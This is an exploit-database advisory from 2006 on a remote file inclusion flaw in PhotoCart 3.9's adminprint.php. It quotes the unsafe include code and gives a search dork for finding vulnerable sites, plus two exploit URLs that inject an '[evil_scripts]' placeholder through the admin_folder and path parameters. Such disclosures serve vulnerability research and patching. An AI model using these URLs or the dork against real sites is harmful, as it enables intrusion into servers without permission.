id: 1184
date: 11/21/2006
title: Photo Cart 3.9 (adminprint.php) Remote File Include Vulnerability
author: irvian
cves: 

=================================================================
Photo Cart 3.9 (adminprint.php) Remote File Include Vulnerability
=================================================================



#####################################################################################################
#
# PhotoCart 3.9 (adminprint.php) Remote File Include Vulnerability
# Dork       : inurl :/PhotoCart/
#
#####################################################################################################
##
##
## Bug Found By : irvian
##
##
####################################################################################################
###
### GreetZ: jipank,kacung,trangkil,ibnusina,cah|gemblunkz,zoid
### Special greetz: #patihack #hitamputih #nyubicrew
###
#####################################################################################################

bug found on /PhotoCart/adminprint.php

include "setup.php";
$path = "$path";
$path = "$path";
include "$admin_folder/_admin_functions.php";
include "$path/_db.php";
    adminsessionCheck();


Expl: http://www.site.com/PhotoCart/adminprint.php?admin_folder=[evil_scripts]
      http://www.site.com/PhotoCart/adminprint.php?path=[evil_scripts]



#  0day.today [2023-03-23]  #